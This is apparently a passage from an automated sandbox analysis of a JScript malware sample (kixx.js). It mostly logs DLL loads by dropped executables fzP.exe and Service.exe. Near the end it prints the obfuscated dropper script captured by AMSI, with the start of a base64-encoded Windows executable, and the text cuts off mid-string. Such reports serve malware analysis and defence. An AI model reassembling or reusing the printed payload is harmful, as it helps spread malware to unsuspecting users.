Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\fzP.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kixx.js

Static file information: File size 1476882 > 1048576

Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: fzP.exe, 00000002.00000002.2049097834.0000000005860000.00000004.08000000.00040000.00000000.sdmp, fzP.exe, 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DE000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000269A000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002716000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002655000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000275E000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002657000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000271D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000302A000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030AD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: fzP.exe, 00000002.00000002.2049097834.0000000005860000.00000004.08000000.00040000.00000000.sdmp, fzP.exe, 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000004.00000002.2158395639.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DC000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.00000000026DE000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000269A000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002716000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002655000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000275E000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.0000000002657000.00000004.00000800.00020000.00000000.sdmp, fzP.exe, 00000011.00000002.2322970402.000000000271D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE5000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.000000000302A000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2404438858.00000000030AD000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);bCpqSdAKZxItwdPUSzKQo = '' pBZhGtWb = 168;var adxmTmATwmNPaJECJabEJHDRoAZIhUPmKagmREQCjWYWNcjgxWYfRRRSZ = 'fySNslcXbEzdRkEKZVnigELQsKKvjUsJNMlGxprkwzlXkDfmTVsweksbmBUhbgnHLqPEyyNjdDlhSngpeYcObvedUK';UvVJIQLeMun = 26;var bnVIJTayLJyVeDDEYfPLmkoeROUuVVnbmCDkHGRcEeJBVarGFLmywiBqzqqvyfcpVXibzTwSOmGHbnIrXOpKioeDBMlQPWeZCTgyrPGmOUkKbtPMhzXkpSGgseanhgD = 'rIhEHGKzHHDvOEUbHwZiQytjkNzFMpSEiQtBuoHFXzQdlXrcYDSqIxnsOyUuHEmSozMxKShToULQiQxNVXh';bCpqSdAKZxItwdPUSzKQo = bCpqSdAKZxItwdPUSzKQo + 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKtj+mYAAAAAAAAAAOAAAgELAQsAAMAAAAAIAAAAAAAAft8AAAAgAAAA4AAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAgAQAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACjfAABTAAAAAOAAAEAFAAAAAAAAAAAAAAAAAAAAAAAAAAABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAhL8AAAAgAAAAwAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAEAFAAAA4AAAAAYAAADCAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAAABAAACAAAAyAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABg3wAAAAAAAEgAAAACAAUAhNIAAKQMAAADAAAAAgAABggjAAB8rwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAgAfAAAAAQAAEXIBAABwKAMAAApzBAAACgoGAm8FAAAKdAEAABsLByoAEzACABsAAAACAAARcwcAAAomFgorDCgDAAAGLAEqBhdYCgYbMvAqABswBQC2AAAAAwAAEXJDAABwKAEAAAYKcoUAAHAoAQAABgsGcscAAHByCQEAcCgKAAAGCgdyxwAAcHIJAQBwKAoAAAYLBigIAAAKDAhyKwEAcG8JAAAKDQlyTQEAcG8KAAAKEwQRBBQajQEAAAETBxEHFigDAAAKbwsAAAqiEQcXclUBAHCiEQcYB6IRBxkWjAsAAAGiEQdvDAAACiYoCAAABigJAAAGFxMG3hMTBREFbw0AAAooDgAAChYTBt4AEQYqAAABEAAAAAAAAKCgABMNAAABBioAABMwAwAnAAAABAAAEX4PAAAKclcBAHBvEAAACgoGcssBAHBy6QEAcG8RAAAKBm8SAAAKKgATMAEAEgAAAAUAABEoEwAACnMUAAAKCgYoBwAABioiAhhvFQAACioAEzADACIAAAAE